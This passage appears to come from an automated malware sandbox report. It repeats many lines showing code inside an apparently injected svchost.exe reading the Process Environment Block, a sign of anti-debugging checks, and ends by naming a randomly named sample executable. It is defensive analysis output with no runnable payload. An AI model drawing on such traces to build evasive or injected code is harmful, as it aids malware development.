Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336656A mov eax, dword ptr fs:[00000030h]	3_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336656A mov eax, dword ptr fs:[00000030h]	3_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336656A mov eax, dword ptr fs:[00000030h]	3_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03338550 mov eax, dword ptr fs:[00000030h]	3_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03338550 mov eax, dword ptr fs:[00000030h]	3_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033545B1 mov eax, dword ptr fs:[00000030h]	3_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033545B1 mov eax, dword ptr fs:[00000030h]	3_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B05A7 mov eax, dword ptr fs:[00000030h]	3_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B05A7 mov eax, dword ptr fs:[00000030h]	3_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B05A7 mov eax, dword ptr fs:[00000030h]	3_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E59C mov eax, dword ptr fs:[00000030h]	3_2_0336E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03332582 mov eax, dword ptr fs:[00000030h]	3_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03332582 mov ecx, dword ptr fs:[00000030h]	3_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03364588 mov eax, dword ptr fs:[00000030h]	3_2_03364588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033325E0 mov eax, dword ptr fs:[00000030h]	3_2_033325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336C5ED mov eax, dword ptr fs:[00000030h]	3_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336C5ED mov eax, dword ptr fs:[00000030h]	3_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033365D0 mov eax, dword ptr fs:[00000030h]	3_2_033365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E5CF mov eax, dword ptr fs:[00000030h]	3_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E5CF mov eax, dword ptr fs:[00000030h]	3_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A430 mov eax, dword ptr fs:[00000030h]	3_2_0336A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332E420 mov eax, dword ptr fs:[00000030h]	3_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332E420 mov eax, dword ptr fs:[00000030h]	3_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332E420 mov eax, dword ptr fs:[00000030h]	3_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332C427 mov eax, dword ptr fs:[00000030h]	3_2_0332C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B6420 mov eax, dword ptr fs:[00000030h]	3_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B6420 mov eax, dword ptr fs:[00000030h]	3_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B6420 mov eax, dword ptr fs:[00000030h]	3_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B6420 mov eax, dword ptr fs:[00000030h]	3_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B6420 mov eax, dword ptr fs:[00000030h]	3_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B6420 mov eax, dword ptr fs:[00000030h]	3_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B6420 mov eax, dword ptr fs:[00000030h]	3_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03368402 mov eax, dword ptr fs:[00000030h]	3_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03368402 mov eax, dword ptr fs:[00000030h]	3_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03368402 mov eax, dword ptr fs:[00000030h]	3_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335A470 mov eax, dword ptr fs:[00000030h]	3_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335A470 mov eax, dword ptr fs:[00000030h]	3_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335A470 mov eax, dword ptr fs:[00000030h]	3_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BC460 mov ecx, dword ptr fs:[00000030h]	3_2_033BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EA456 mov eax, dword ptr fs:[00000030h]	3_2_033EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332645D mov eax, dword ptr fs:[00000030h]	3_2_0332645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335245A mov eax, dword ptr fs:[00000030h]	3_2_0335245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E443 mov eax, dword ptr fs:[00000030h]	3_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E443 mov eax, dword ptr fs:[00000030h]	3_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E443 mov eax, dword ptr fs:[00000030h]	3_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E443 mov eax, dword ptr fs:[00000030h]	3_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E443 mov eax, dword ptr fs:[00000030h]	3_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E443 mov eax, dword ptr fs:[00000030h]	3_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E443 mov eax, dword ptr fs:[00000030h]	3_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E443 mov eax, dword ptr fs:[00000030h]	3_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033644B0 mov ecx, dword ptr fs:[00000030h]	3_2_033644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BA4B0 mov eax, dword ptr fs:[00000030h]	3_2_033BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033364AB mov eax, dword ptr fs:[00000030h]	3_2_033364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EA49A mov eax, dword ptr fs:[00000030h]	3_2_033EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033304E5 mov ecx, dword ptr fs:[00000030h]	3_2_033304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335EB20 mov eax, dword ptr fs:[00000030h]	3_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335EB20 mov eax, dword ptr fs:[00000030h]	3_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F8B28 mov eax, dword ptr fs:[00000030h]	3_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F8B28 mov eax, dword ptr fs:[00000030h]	3_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AEB1D mov eax, dword ptr fs:[00000030h]	3_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332CB7E mov eax, dword ptr fs:[00000030h]	3_2_0332CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DEB50 mov eax, dword ptr fs:[00000030h]	3_2_033DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E4B4B mov eax, dword ptr fs:[00000030h]	3_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E4B4B mov eax, dword ptr fs:[00000030h]	3_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C6B40 mov eax, dword ptr fs:[00000030h]	3_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C6B40 mov eax, dword ptr fs:[00000030h]	3_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FAB40 mov eax, dword ptr fs:[00000030h]	3_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D8B42 mov eax, dword ptr fs:[00000030h]	3_2_033D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340BBE mov eax, dword ptr fs:[00000030h]	3_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340BBE mov eax, dword ptr fs:[00000030h]	3_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	3_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	3_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03338BF0 mov eax, dword ptr fs:[00000030h]	3_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03338BF0 mov eax, dword ptr fs:[00000030h]	3_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03338BF0 mov eax, dword ptr fs:[00000030h]	3_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335EBFC mov eax, dword ptr fs:[00000030h]	3_2_0335EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BCBF0 mov eax, dword ptr fs:[00000030h]	3_2_033BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DEBD0 mov eax, dword ptr fs:[00000030h]	3_2_033DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03350BCB mov eax, dword ptr fs:[00000030h]	3_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03350BCB mov eax, dword ptr fs:[00000030h]	3_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03350BCB mov eax, dword ptr fs:[00000030h]	3_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330BCD mov eax, dword ptr fs:[00000030h]	3_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330BCD mov eax, dword ptr fs:[00000030h]	3_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330BCD mov eax, dword ptr fs:[00000030h]	3_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03354A35 mov eax, dword ptr fs:[00000030h]	3_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03354A35 mov eax, dword ptr fs:[00000030h]	3_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336CA38 mov eax, dword ptr fs:[00000030h]	3_2_0336CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336CA24 mov eax, dword ptr fs:[00000030h]	3_2_0336CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335EA2E mov eax, dword ptr fs:[00000030h]	3_2_0335EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BCA11 mov eax, dword ptr fs:[00000030h]	3_2_033BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033ACA72 mov eax, dword ptr fs:[00000030h]	3_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033ACA72 mov eax, dword ptr fs:[00000030h]	3_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336CA6F mov eax, dword ptr fs:[00000030h]	3_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336CA6F mov eax, dword ptr fs:[00000030h]	3_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336CA6F mov eax, dword ptr fs:[00000030h]	3_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DEA60 mov eax, dword ptr fs:[00000030h]	3_2_033DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336A50 mov eax, dword ptr fs:[00000030h]	3_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336A50 mov eax, dword ptr fs:[00000030h]	3_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336A50 mov eax, dword ptr fs:[00000030h]	3_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336A50 mov eax, dword ptr fs:[00000030h]	3_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336A50 mov eax, dword ptr fs:[00000030h]	3_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336A50 mov eax, dword ptr fs:[00000030h]	3_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03336A50 mov eax, dword ptr fs:[00000030h]	3_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340A5B mov eax, dword ptr fs:[00000030h]	3_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340A5B mov eax, dword ptr fs:[00000030h]	3_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03338AA0 mov eax, dword ptr fs:[00000030h]	3_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03338AA0 mov eax, dword ptr fs:[00000030h]	3_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03386AA4 mov eax, dword ptr fs:[00000030h]	3_2_03386AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03368A90 mov edx, dword ptr fs:[00000030h]	3_2_03368A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80 mov eax, dword ptr fs:[00000030h]	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404A80 mov eax, dword ptr fs:[00000030h]	3_2_03404A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336AAEE mov eax, dword ptr fs:[00000030h]	3_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336AAEE mov eax, dword ptr fs:[00000030h]	3_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330AD0 mov eax, dword ptr fs:[00000030h]	3_2_03330AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03364AD0 mov eax, dword ptr fs:[00000030h]	3_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03364AD0 mov eax, dword ptr fs:[00000030h]	3_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03386ACC mov eax, dword ptr fs:[00000030h]	3_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03386ACC mov eax, dword ptr fs:[00000030h]	3_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03386ACC mov eax, dword ptr fs:[00000030h]	3_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B892A mov eax, dword ptr fs:[00000030h]	3_2_033B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C892B mov eax, dword ptr fs:[00000030h]	3_2_033C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BC912 mov eax, dword ptr fs:[00000030h]	3_2_033BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03328918 mov eax, dword ptr fs:[00000030h]	3_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03328918 mov eax, dword ptr fs:[00000030h]	3_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE908 mov eax, dword ptr fs:[00000030h]	3_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AE908 mov eax, dword ptr fs:[00000030h]	3_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D4978 mov eax, dword ptr fs:[00000030h]	3_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D4978 mov eax, dword ptr fs:[00000030h]	3_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BC97C mov eax, dword ptr fs:[00000030h]	3_2_033BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03356962 mov eax, dword ptr fs:[00000030h]	3_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03356962 mov eax, dword ptr fs:[00000030h]	3_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03356962 mov eax, dword ptr fs:[00000030h]	3_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0337096E mov eax, dword ptr fs:[00000030h]	3_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0337096E mov edx, dword ptr fs:[00000030h]	3_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0337096E mov eax, dword ptr fs:[00000030h]	3_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B0946 mov eax, dword ptr fs:[00000030h]	3_2_033B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B89B3 mov esi, dword ptr fs:[00000030h]	3_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B89B3 mov eax, dword ptr fs:[00000030h]	3_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B89B3 mov eax, dword ptr fs:[00000030h]	3_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0 mov eax, dword ptr fs:[00000030h]	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033309AD mov eax, dword ptr fs:[00000030h]	3_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033309AD mov eax, dword ptr fs:[00000030h]	3_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033629F9 mov eax, dword ptr fs:[00000030h]	3_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033629F9 mov eax, dword ptr fs:[00000030h]	3_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BE9E0 mov eax, dword ptr fs:[00000030h]	3_2_033BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033649D0 mov eax, dword ptr fs:[00000030h]	3_2_033649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FA9D3 mov eax, dword ptr fs:[00000030h]	3_2_033FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C69C0 mov eax, dword ptr fs:[00000030h]	3_2_033C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03352835 mov eax, dword ptr fs:[00000030h]	3_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03352835 mov eax, dword ptr fs:[00000030h]	3_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03352835 mov eax, dword ptr fs:[00000030h]	3_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03352835 mov ecx, dword ptr fs:[00000030h]	3_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03352835 mov eax, dword ptr fs:[00000030h]	3_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03352835 mov eax, dword ptr fs:[00000030h]	3_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336A830 mov eax, dword ptr fs:[00000030h]	3_2_0336A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D483A mov eax, dword ptr fs:[00000030h]	3_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D483A mov eax, dword ptr fs:[00000030h]	3_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BC810 mov eax, dword ptr fs:[00000030h]	3_2_033BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BE872 mov eax, dword ptr fs:[00000030h]	3_2_033BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BE872 mov eax, dword ptr fs:[00000030h]	3_2_033BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C6870 mov eax, dword ptr fs:[00000030h]	3_2_033C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C6870 mov eax, dword ptr fs:[00000030h]	3_2_033C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03360854 mov eax, dword ptr fs:[00000030h]	3_2_03360854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03334859 mov eax, dword ptr fs:[00000030h]	3_2_03334859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03334859 mov eax, dword ptr fs:[00000030h]	3_2_03334859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03342840 mov ecx, dword ptr fs:[00000030h]	3_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034008C0 mov eax, dword ptr fs:[00000030h]	3_2_034008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BC89D mov eax, dword ptr fs:[00000030h]	3_2_033BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330887 mov eax, dword ptr fs:[00000030h]	3_2_03330887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336C8F9 mov eax, dword ptr fs:[00000030h]	3_2_0336C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336C8F9 mov eax, dword ptr fs:[00000030h]	3_2_0336C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FA8E4 mov eax, dword ptr fs:[00000030h]	3_2_033FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335E8C0 mov eax, dword ptr fs:[00000030h]	3_2_0335E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335EF28 mov eax, dword ptr fs:[00000030h]	3_2_0335EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03332F12 mov eax, dword ptr fs:[00000030h]	3_2_03332F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03404F68 mov eax, dword ptr fs:[00000030h]	3_2_03404F68

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

